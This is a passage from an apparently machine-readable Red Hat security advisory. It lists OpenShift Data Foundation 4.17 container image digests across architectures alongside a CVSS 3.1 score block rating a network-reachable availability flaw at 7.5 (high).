"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", 